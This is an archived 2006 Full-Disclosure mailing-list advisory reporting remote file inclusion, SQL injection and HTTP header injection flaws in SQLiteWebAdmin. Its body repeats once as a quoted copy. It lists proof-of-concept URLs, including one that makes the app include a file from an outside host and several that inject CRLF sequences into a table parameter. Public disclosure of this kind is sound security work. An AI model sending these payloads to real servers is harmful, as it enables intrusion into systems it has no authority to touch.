[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities
- To: vuldb@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities
- From: SirDarckCat <sirdarckcat@xxxxxxxxx>
- Date: Sat, 29 Jul 2006 23:43:39 -0500
Discovered by Sirdarckcat from elhacker.net
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================
SQLiteWebAdmin is a simple script for managing a
DataBase.
It has several security bugs.
==============================================
Remote File Inclusion:
PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/
?
==============================================
SQLinjection:
PoC:
http://www.server.com/table_editfield.php?table='+[SQL]
==============================================
And also Header Injection:
PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value
==============================================
Att.
Sirdarckcat
elhacker.net
--
Att.
SirDarckCat@xxxxxxxxx
http://www.google.com/search?q=sirdarckcat
Discovered by Sirdarckcat from elhacker.net
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================
SQLiteWebAdmin is a simple script for managing a
DataBase.
It has several security bugs.
==============================================
Remote File Inclusion:
PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/?
==============================================
SQLinjection:
PoC:
http://www.server.com/table_editfield.php?table='+[SQL]
==============================================
And also Header Injection:
PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value
==============================================
Att.
Sirdarckcat
elhacker.net
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/